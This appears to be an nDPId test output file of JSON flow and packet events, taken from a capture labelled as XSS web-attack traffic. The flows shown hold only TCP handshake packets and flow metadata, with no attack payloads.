+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347493167,"flow_last_seen":1499347498750,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57778,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347493167,"flow_last_seen":1499347498750,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57778,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347494446,"flow_last_seen":1499347499749,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57792,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347494446,"flow_last_seen":1499347499749,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57792,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347495714,"flow_last_seen":1499347500750,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57806,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347495714,"flow_last_seen":1499347500750,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57806,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347498249,"flow_last_seen":1499347503750,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57832,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347498249,"flow_last_seen":1499347503750,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57832,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347499500,"flow_last_seen":1499347504749,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57846,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347499500,"flow_last_seen":1499347504749,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57846,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347500770,"flow_last_seen":1499347506751,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57860,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347500770,"flow_last_seen":1499347506751,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57860,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5543,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347630130,"flow_last_seen":1499347630130,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347630130,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5543,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":392,"flow_packet_id":1,"flow_last_seen":1499347630130,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347630130,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rFRAAD4GGXysEAABwKgKMuduAFDOysKMAAAAAKACchB12gAAAgQFtAQCCAoBO27YAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5545,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":392,"flow_packet_id":2,"flow_last_seen":1499347630130,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347630130,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5252igpmzsrCjaAScSCxlQAAAgQFtAQCCAoD5UBOATtu2AEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5546,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":392,"flow_packet_id":3,"flow_last_seen":1499347630131,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347630131,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rFVAAD4GGYOsEAABwKgKMuduAFDOysKNdooKZ4AQAOVQnAAAAQEICgE7btkD5UBO"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5555,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347631388,"flow_last_seen":1499347631388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347631388,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59260,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5555,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":393,"flow_packet_id":1,"flow_last_seen":1499347631388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347631388,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+pxAAD4GyzOsEAABwKgKMud8AFDgpIqPAAAAAKACchCatAAAAgQFtAQCCAoBO3ATAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5556,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":393,"flow_packet_id":2,"flow_last_seen":1499347631388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347631388,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ53x5W3jF4KSKkKAScSBkBQAAAgQFtAQCCAoD5UGIATtwEwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5558,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":393,"flow_packet_id":3,"flow_last_seen":1499347631389,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347631389,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+p1AAD4GyzqsEAABwKgKMud8AFDgpIqQeVt4xoAQAOUDDQAAAQEICgE7cBMD5UGI"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5568,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347632635,"flow_last_seen":1499347632635,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347632635,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59274,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5568,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":394,"flow_packet_id":1,"flow_last_seen":1499347632635,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347632635,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8d6hAAD4GTiisEAABwKgKMueKAFDGJwbjAAAAAKACchA3mAAAAgQFtAQCCAoBO3FLAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5569,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":394,"flow_packet_id":2,"flow_last_seen":1499347632635,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347632635,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ54oMamRgxicG5KAScSCBBwAAAgQFtAQCCAoD5ULAATtxSwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5570,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":394,"flow_packet_id":3,"flow_last_seen":1499347632636,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347632636,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0d6lAAD4GTi+sEAABwKgKMueKAFDGJwbkDGpkYYAQAOUgDwAAAQEICgE7cUsD5ULA"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5587,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347635154,"flow_last_seen":1499347635154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347635154,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59300,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5587,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":395,"flow_packet_id":1,"flow_last_seen":1499347635154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347635154,"pkt":"ABm5CmnxAMGxFOsxCABFAAA84sRAAD4G4wusEAABwKgKMuekAFB1fpEEAAAAAKACchD7kAAAAgQFtAQCCAoBO3PAAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5588,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":395,"flow_packet_id":2,"flow_last_seen":1499347635154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347635154,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ56RhPiSidX6RBaAScSAtdAAAAgQFtAQCCAoD5UU2ATtzwAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5590,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":395,"flow_packet_id":3,"flow_last_seen":1499347635156,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347635156,"pkt":"ABm5CmnxAMGxFOsxCABFAAA04sVAAD4G4xKsEAABwKgKMuekAFB1fpEFYT4ko4AQAOXMegAAAQEICgE7c8ED5UU2"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5599,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347636429,"flow_last_seen":1499347636429,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347636429,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59314,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5599,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":396,"flow_packet_id":1,"flow_last_seen":1499347636429,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347636429,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8AchAAD4GxAisEAABwKgKMueyAFDHeXU3AAAAAKACchDEFQAAAgQFtAQCCAoBO3T\/AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5600,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":396,"flow_packet_id":2,"flow_last_seen":1499347636429,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347636429,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ57LbsY4Yx3l1OKAScSAQ0QAAAgQFtAQCCAoD5UZ0ATt0\/wEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5602,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":396,"flow_packet_id":3,"flow_last_seen":1499347636431,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347636431,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0AclAAD4GxA+sEAABwKgKMueyAFDHeXU427GOGYAQAOWv1wAAAQEICgE7dQAD5UZ0"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5611,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347637687,"flow_last_seen":1499347637687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637687,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59328,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5611,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":397,"flow_packet_id":1,"flow_last_seen":1499347637687,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347637687,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8W0xAAD4GaoSsEAABwKgKMufAAFAySC12AAAAAKACchCfvwAAAgQFtAQCCAoBO3Y6AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5612,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":397,"flow_packet_id":2,"flow_last_seen":1499347637687,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347637687,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ58BffWshMkgtd6AScSCKawAAAgQFtAQCCAoD5UevATt2OgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5613,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":397,"flow_packet_id":3,"flow_last_seen":1499347637688,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347637688,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0W01AAD4GaousEAABwKgKMufAAFAySC13X31rIoAQAOUpcwAAAQEICgE7djoD5Uev"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347503273,"flow_last_seen":1499347508751,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57886,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347503273,"flow_last_seen":1499347508751,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57886,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347504529,"flow_last_seen":1499347509751,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57900,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347504529,"flow_last_seen":1499347509751,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57900,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347505774,"flow_last_seen":1499347511753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57914,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347505774,"flow_last_seen":1499347511753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57914,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347508344,"flow_last_seen":1499347513753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57940,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347508344,"flow_last_seen":1499347513753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347509601,"flow_last_seen":1499347514754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57954,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347509601,"flow_last_seen":1499347514754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347637795,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57954,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 